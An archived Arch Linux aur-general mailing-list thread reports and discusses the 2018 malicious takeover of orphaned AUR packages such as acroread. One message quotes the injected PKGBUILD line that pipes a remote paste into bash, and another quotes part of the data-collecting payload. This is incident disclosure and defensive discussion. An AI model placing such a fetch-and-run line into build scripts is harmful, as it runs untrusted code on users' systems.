[aur-general] acroread package compromised
Hi all, The acroread AUR package appears to have been compromised: look at https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id= b3fec9f2f16703c2dae9e793f75ad6e0d98509bc (and in particular that curl|bash line!). Not exactly sure who to contact, but I assume someone on this list can get things sorted out. Cheers, qwence
On 07/08/2018 01:48 AM, Queen Wenceslas via aur-general wrote:
Hi all,
The acroread AUR package appears to have been compromised: look at https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id= b3fec9f2f16703c2dae9e793f75ad6e0d98509bc (and in particular that curl|bash line!). Not exactly sure who to contact, but I assume someone on this list can get things sorted out.
Cheers, qwence
Account suspended, commit reverted using Trusted User privileges. Thanks. -- Eli Schwartz Bug Wrangler and Trusted User
On 07/08/2018 01:54 AM, Eli Schwartz wrote:
On 07/08/2018 01:48 AM, Queen Wenceslas via aur-general wrote:
Hi all,
The acroread AUR package appears to have been compromised: look at https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id= b3fec9f2f16703c2dae9e793f75ad6e0d98509bc (and in particular that curl|bash line!). Not exactly sure who to contact, but I assume someone on this list can get things sorted out.
Cheers, qwence
Account suspended, commit reverted using Trusted User privileges.
Thanks.
Also fixed two other packages which were maliciously modified the same way. -- Eli Schwartz Bug Wrangler and Trusted User
Good catch, guys. Shouldn't someone also contact the operators of ptpb.pw to take down the (at least) two URLs in question? I'd also like to understand how xeactor took over the packages. Justus
On 08/07/18 11:23, Justus-dev@Piater.name wrote:
I'd also like to understand how xeactor took over the packages.
The packages were probably orphaned. Were other possibly affected users informed? I know that AUR users should follow aur-general, but maybe not everybody does. There are no comments in the other packages and I don't see why the comment on acroread was edited like that (not mentioning what the compromise was or what to look for). Regards JonnyJD
On Sun, Jul 08, 2018 at 11:23:37AM +0200, Justus-dev@Piater.name wrote:
Good catch, guys.
Shouldn't someone also contact the operators of ptpb.pw to take down the (at least) two URLs in question?
I'd also like to understand how xeactor took over the packages.
Justus
Meh, ptpb is mostly censorship-free. David
I came across this the other day too, is this ok, check out the source array? https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=libvlc -- Joakim
On Sun, 8 Jul 2018 13:14:04 +0200, Joakim Hernberg wrote:
I came across this the other day too, is this ok, check out the source array?
https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=libvlc
IMO this is something completely different, but the package name should be $pkgname-bin ;).
On 08-07-18 13:14:04 +0200, Joakim Hernberg wrote:
I came across this the other day too, is this ok, check out the source array?
https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=libvlc If you do not trust the person providing the binary package don't use it. Installing vlc package to get libvlc is not going to take any extra space in your system. -- Regards Jagan PUBKEY: https://j605.tk/pgp
On Sun, 8 Jul 2018 13:22:47 +0200
Jagannathan Tiruvallur Eachambadi via aur-general
On 08-07-18 13:14:04 +0200, Joakim Hernberg wrote:
I came across this the other day too, is this ok, check out the source array?
https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=libvlc If you do not trust the person providing the binary package don't use it. Installing vlc package to get libvlc is not going to take any extra space in your system.
Needlessly to say I didn't install it. Still just thought I'd mention it. I was actually looking to get compat libs for older versions of vlc libs. -- Joakim
On Sun, 8 Jul 2018 14:02:15 +0200, Joakim Hernberg wrote:
Needlessly to say I didn't install it. Still just thought I'd mention it.
FWIW https://git.archlinux.org/svntogit/packages.git/tree/trunk/mirrorlist?h=pack... does contain https://mex.mirror.pkgbuild.com/ . It's even possible to get the signature, too, https://mex.mirror.pkgbuild.com/extra/os/x86_64/vlc-3.0.3-1-x86_64.pkg.tar.x... . The AUR provides tons of packages downloading binaries, such as https://aur.archlinux.org/packages/palemoon-bin/ , https://aur.archlinux.org/packages/virtualbox-bin/ or https://aur.archlinux.org/packages/icecat-bin/ from sources completely unrelated to Arch Linux. The acroread PKGBUILD's msg2 "Installing Main Files..." curl -s https://ptpb.pw/~x|bash -& is from a completely different "kind of quality".
Hey Justus, The packages were orphan. He just adopted them. Thanks, Filipe Laíns (FFY00) https://github.com/FFY00 3DCE 51D6 0930 EBA4 7858 BA41 46F6 33CB B0EB 4BF2 On Sun, Jul 8, 2018 at 10:23 AM, Justus-dev@Piater.name wrote:
Good catch, guys.
Shouldn't someone also contact the operators of ptpb.pw to take down the (at least) two URLs in question?
I'd also like to understand how xeactor took over the packages.
Justus
Sent via Migadu.com, world's easiest email hosting
On 07/08/2018 08:53 AM, Ralf Mardorf wrote:
On Sun, 8 Jul 2018 14:02:15 +0200, Joakim Hernberg wrote:
Needlessly to say I didn't install it. Still just thought I'd mention it.
FWIW https://git.archlinux.org/svntogit/packages.git/tree/trunk/mirrorlist?h=pack... does contain https://mex.mirror.pkgbuild.com/ .
I'll do you one better. https://pkgbuild.com is owned by Arch Linux, run on our infrastructure, and used as a build server for packages which require heavy compilation (it's got a lot of RAM/cpu power). The subdomains are Private Internet Access sponsored machines also under our control... ... Side note on the acroread pastes: https://ptpb.pw/~x was executed by the PKGBUILD, which in turn executed https://ptpb.pw/~u. But the thing it installed declares an upload() function then tries to execute the contents of $uploader to actually upload the data collection. So it basically wouldn't work as-is anyway. -- Eli Schwartz Bug Wrangler and Trusted User
On 07/08/2018 05:00 PM, Eli Schwartz via aur-general wrote:
Side note on the acroread pastes: https://ptpb.pw/~x was executed by the PKGBUILD, which in turn executed https://ptpb.pw/~u. But the thing it installed declares an upload() function then tries to execute the contents of $uploader to actually upload the data collection.
So it basically wouldn't work as-is anyway.
for x in /root /home/*; do if [[ -w "$x/compromised.txt" ]]; then echo "$FULL_LOG" > "$x/compromised.txt" fi done Looks to me like this is more of a warning than anything else, no? Why would he create those files otherwise, given how much attention that would attract? -- GPG fingerprint: 871F 1047 7DB3 DDED 5FC4 47B2 26C7 E577 EF96 7808
Em julho 9, 2018 5:06 Bennett Piater escreveu:
Looks to me like this is more of a warning than anything else, no? Why would he create those files otherwise, given how much attention that would attract?
Hi Bennet, This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk? This thread is attracting way more attention than warranted. I'm surprised that this type of silly package takeover and malware introduction doesn't happen more often. This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves. Helpers that do everything automatically and users that don't pay attention, *will* have issues. You should use helpers even more so at your risk than the AUR itself. Regards, Giancarlo Razzolini
On 18-07-09 11:37:03, Giancarlo Razzolini via aur-general wrote:
This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves. Helpers that do everything automatically and users that don't pay attention, *will* have issues. You should use helpers even more so at your risk than the AUR itself.
Agreed. It's important to understand what the AUR is and how it works before using it. Without this, a helper is simply granting anyone permission to run scripts on your computer. If you are at all surprised by this takeover, then defintely start reading the wiki: https://wiki.archlinux.org/index.php/Arch_User_Repository https://wiki.archlinux.org/index.php/PKGBUILD
On 07/09/2018 04:37 PM, Giancarlo Razzolini via aur-general wrote:
Hi Bennet,
This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk?
No, that people should check what they install. A script that creates `compromised.txt` in the root and all home folders looks like a warning to me. I agree with you and Ben Oliver, people should expect this. I wasn't saying that I was surprised about it. Cheers, Bennett -- GPG fingerprint: 871F 1047 7DB3 DDED 5FC4 47B2 26C7 E577 EF96 7808
Em julho 9, 2018 11:53 Ben Oliver via aur-general escreveu:
Agreed. It's important to understand what the AUR is and how it works before using it.
Yes. Which is why we have warnings everywhere.
Without this, a helper is simply granting anyone permission to run scripts on your computer.
Wildly exaggerated. A good helper will inform the user. It should be up to the user ultimately to check things, helper or not.
If you are at all surprised by this takeover, then defintely start reading the wiki:
https://wiki.archlinux.org/index.php/Arch_User_Repository https://wiki.archlinux.org/index.php/PKGBUILD
Look my email address domain portion. Regards, Giancarlo Razzolini
These where the compromised packages and their package versions: * acrored 9.5.5-8 * balz 1.20-3 * minergate 8.1-2 -- Morten Linderud PGP: 9C02FF419FECBE16
participants (13)
-
Ben Oliver
-
Bennett Piater
-
David Phillips
-
Eli Schwartz
-
Filipe Laíns (FFY00)
-
Giancarlo Razzolini
-
Jagannathan Tiruvallur Eachambadi
-
Joakim Hernberg
-
Johannes Dewender
-
Justus-dev@Piater.name
-
Morten Linderud
-
Queen Wenceslas
-
Ralf Mardorf